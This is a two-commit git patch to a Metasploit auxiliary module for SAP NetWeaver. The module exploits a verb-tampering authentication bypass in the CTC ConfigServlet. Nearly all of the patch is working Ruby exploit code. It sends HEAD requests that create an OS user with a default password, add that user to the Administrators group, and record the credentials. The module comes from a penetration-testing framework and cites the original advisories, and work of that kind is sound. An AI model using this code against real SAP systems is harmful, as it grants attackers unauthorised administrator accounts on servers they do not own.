From 7823df0478610c8f071daddd7c43ad25e6367b2a Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 16 May 2013 10:41:25 -0500 Subject: [PATCH 1/2] Change module filename --- ...d_user_and_add_role.rb => sap_ctc_verb_tampering_user_mgmt.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/sap/{sap_ctc_verb_tampering_add_user_and_add_role.rb => sap_ctc_verb_tampering_user_mgmt.rb} (100%) diff --git a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_add_user_and_add_role.rb b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb similarity index 100% rename from modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_add_user_and_add_role.rb rename to modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb From c21035c0b9fdba52d5a1eead2fc267812bddd2a9 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 16 May 2013 10:42:09 -0500 Subject: [PATCH 2/2] Add final cleanup for sap_ctc_verb_tampering_user_mgmt --- .../sap/sap_ctc_verb_tampering_user_mgmt.rb | 89 ++++++++++++------- 1 file changed, 59 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb index 039910da90..146ff05f91 100644 --- a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb +++ b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb @@ -31,49 +31,78 @@ class Metasploit4 < Msf::Auxiliary def initialize super( - 'Name' => 'SAP CTC Service Verb Tampering (add user and add role)', + 'Name' => 'SAP CTC Service Verb Tampering User Management', 'Description' => %q{ - This module exploits an authentication bypass vulnerability in SAP NetWeaver CTC service. - The service is vulnerable to verb tampering and allows for unauthorised user management. - SAP Note 1589525, 1624450 / DSECRG-11-041. - }, - 'References' => [['URL','http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/']], - 'Author' => ['nmonkee'], + This module exploits an authentication bypass vulnerability in SAP NetWeaver + CTC service. The service is vulnerable to verb tampering allowing for unauthorised + OS user management. Information about resolution should be available at SAP notes + 1589525 and 1624450 (authentication required). + }, + 'References' => + [ + [ 'URL', 'http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/' ], + [ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf' ] + ], + 'Author' => + [ + 'Alexandr Polyakov', # Vulnerability discovery + 'nmonkee' # Metasploit module + ], 'License' => MSF_LICENSE - ) + ) register_options([ - OptString.new('USER', [true, 'Username', nil]), - OptString.new('PASS', [true, 'Password', nil]), - OptString.new('GROUP', [true, 'Group', nil]) - ], self.class) + Opt::RPORT(50000), + OptString.new('USERNAME', [true, 'Username to create', 'msf']), + OptString.new('PASSWORD', [true, 'Password for the new user', '$Metasploit1234$']), + OptString.new('GROUP', [true, 'Group for the new user', 'Administrators']) + ], self.class) end def run_host(ip) - uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=' + datastore['USER'] + ',PASSWORD=' + datastore['PASS'] - send_request(uri) - uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=' + datastore['USER'] + ',GROUPNAME=' + datastore['GROUP'] - send_request(uri) + vprint_status("#{rhost}:#{rport} - Creating User...") + uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=' + datastore['USERNAME'] + ',PASSWORD=' + datastore['PASSWORD'] + if send_request(uri) + print_good("#{rhost}:#{rport} - User #{datastore['USERNAME']} with password #{datastore['PASSWORD']} successfully created") + else + return + end + + vprint_status("#{rhost}:#{rport} - Adding User to Group...") + uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=' + datastore['USERNAME'] + ',GROUPNAME=' + datastore['GROUP'] + if send_request(uri) + print_good("#{rhost}:#{rport} - User #{datastore['USERNAME']} added to group #{datastore['GROUP']}") + else + return + end + + report_auth_info( + :host => rhost, + :port => rport, + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], + :ptype => "password", + :active => true + ) end def send_request(uri) begin - print_status("[SAP] #{rhost}:#{rport} - sending request") - res = send_request_raw({ + res = send_request_cgi({ 'uri' => uri, 'method' => 'HEAD', - 'headers' =>{ - 'Cookie' => 'sap-usercontext=sap-language=EN', - 'Content-Type' => 'text/xml; charset=UTF-8',} - }, 45) - if res - vprint_error("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s) - vprint_error("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s) - vprint_error("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s) - end - rescue ::Rex::ConnectionError - print_error("#{rhost}:#{rport} - Unable to connect") - return + 'ctype' => 'text/xml; charset=UTF-8', + 'cookie' => 'sap-usercontext=sap-language=EN' + }) + if res and res.code == 200 and res.headers['Server'] =~ /SAP J2EE Engine/ + return true + elsif res + vprint_error("#{rhost}:#{rport} - Unexpected Response: #{res.code} #{res.message}") + return false end + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Unable to connect") + return false end end +end